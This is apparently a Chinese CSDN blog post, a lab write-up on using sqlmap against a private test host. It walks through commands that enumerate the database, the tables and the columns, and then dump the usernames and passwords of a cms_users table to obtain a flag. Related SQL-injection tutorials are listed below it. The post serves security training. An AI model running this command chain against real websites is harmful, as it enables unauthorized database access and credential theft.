Sql注入实验 二

最新推荐文章于 2023-09-13 20:20:16 发布
最新推荐文章于 2023-09-13 20:20:16 发布
阅读量357 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nocker888/article/details/103005680
版权

Sql注入二 sqlmap工具的利用

我们看过这么多的道理,却仍旧过不好这一生。

  • sqlmap 我就不介绍了,大家应该都懂,不懂的你专业问题有点问题。

对于sqlmap的用法如果不会 可以help 一下

在这里插入图片描述

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

最常用的办法
我是win 系统

python sqlmap.py -u url

在这里插入图片描述

已知数据库为mysql,输入N,不需要在测试
在这里插入图片描述

后面的选项默认回车就可以了

存在多种注入,
在这里插入图片描述

获取当前数据库名

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 --current-db

在这里插入图片描述

这里就获取cms 数据库里的表

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms --tables

在这里插入图片描述

获取 cms_users 里面的内容

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms -T cms_users --columns

这里获取到了3个字段
在这里插入图片描述

最后一步对字段进行爆破

python sqlmap.py -u http://192.168.10.131/cms/show.php?id=38 -D cms -T cms_users -C userid,username,password --dump

得到flag
在这里插入图片描述

庸人自扰#7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入相关实验报告.doc
01-05
将恶意的SQL命令插入到输入域名或页面请求的查询字符串注入到后台数据库,输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
oracle sql查询时间_「Burpsuite练兵场」SQL注入及相关实验
weixin_39715652的博客
12-04 150
Burpsuite练兵场系列文章更新啦,今天的内容是延续上期关于SQL注入及相关实验的讲解,对实验感兴趣的小伙伴千万别错过了呦!上期回顾「Burpsuite练兵场」SQL注入及相关实验(一)上节内容介绍了一些基础的SQL注入操作,这一节实验学习的内容为如何在探查到了SQL注入点后利用漏洞获取到数据库信息。通过SQL注入获取数据库信息获取数据库的关键信息,如数据库中的表和列需要访问保存描述各种数据库...
web安全漏洞-SQL注入实验2
m0_63645854的博客
09-13 878
本文主要介绍了sql显注的漏洞判断原理,sqlmap工具的使用以及分析SQL注入漏洞的成因
SQL注入实验
Bonjour~
03-16 6161
信息安全实验 SQL Injection
合天实验室—sql注入实验
qq_44813849的博客
09-23 768
实例一 和sql注入实验一一样的步骤,先看一下是否存在注入 这个通过测试发现存在注入 猜测字段数 这一题主要是在将单引号注释掉%23 这个字段数也是6 接着猜测字段内容 实例 这个操作步骤和一完全一样。 ...
合天——SQL注入实验
qq_44832048的博客
09-28 653
实例一: 将单引号放在%23(#)后转义掉后面的内容。发现存在注入点。 通过order by 数字判断表有几个字段,在数字为5时,仍能出现信息,但当 变成6时,变成空,说明有5个字段 通过union联合查询。可以得到用户名和密码, 实例: 方法与实例一 一样得到结果如下 根据代码提示就是将非字符和非数字转义掉 ...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
常规漏洞利用-sql注入实验指导书.pdf
08-03
常规漏洞利用-sql注入实验指导书#资源分享达人#
sql注入实验
11-28
锐捷网络大学,isec网络攻防实验sql注入文档详解。。。
人工智能实验 SQL注入检测
最新发布
01-15
构建分类器完成SQL注入语句的检测任务,区分正常访问(normal)或含SQL注入攻击(attack)的网络包。
sql注入实验 ——合天网安实验室学习笔记
weixin_42582241的博客
03-24 737
实验链接 SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。...
注入之SQL注入2
bwxzdjn的博客
03-19 1610
实验案例的形式记录一些新的注入技术,如:POST注入、基于报错的注入、基于布尔的盲注和基于时间的盲注,采用手工注入的方法了解SQL注入的新的思路。
简单的sql注入之一 (实验吧)
wewww111的博客
08-11 3778
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
实验吧ctf-web题:简单的sql注入
热门推荐
Elvira
08-25 1万+
简单的sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 701
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
简单SQL注入实验
qq_43518594的博客
10-30 3212
一、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 SQL注入原理 一般情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
实验——SQL注入
weixin_44870846的博客
07-28 379
目录 利用SQL注入,将cms的后台管理的密码和用户破解出来 判断是否有回显 判断数据库是否有报错 判断是字符型还是数字型 判断是否有布尔类型状态 判断列数 判断显示位 输出数据库的名字 查询所有的表名 字段编码不同出现问题的解决方法 获取字段名 获得字段内容 MD5解密 利用SQL注入,将cms的后台管理的密码和用户破解出来 目标系统:cms网站 操作工具:hackbar 判断是否有回显 根据变换id,数据库中的内容是否回显在网页中判断 http://192..
SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
Until_U的博客
07-05 3713
1 项目实验环境 测试渗透机:kali_linux-2020 链接:https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码:32ve 目标靶机:owasp_Broken_Web_Apps 链接:https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码:9zsj 2 SQL注入概述 2.1 SQL注入简介 在owasp年度top 10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊..
sql注入实验总结_SQL注入实验学习笔记
weixin_33430573的博客
01-09 1229
实操靶场地址:实验:sql注入实验一(合天网安实验室)​sourl.cn根据指导书我们要先在实验机进入这个网址http://10.1.1.11:81进入之后会看到三个实例。实例一根据指导书的提示来做这一题。后面两个实例也要看这个指导书。先判断是否存在注入方法一 在参数后面加上单引号,比如:http://xxx/abc.php?id=1’如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是...
如何进行sql注入实验
05-22
在进行SQL注入实验之前,请务必获得合法的授权,并且仅在授权范围内进行操作。 如果您已经获得了合法授权,可以按照以下步骤进行SQL注入实验: 1. 找到一个目标网站,该网站使用了动态生成SQL语句的方式来访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值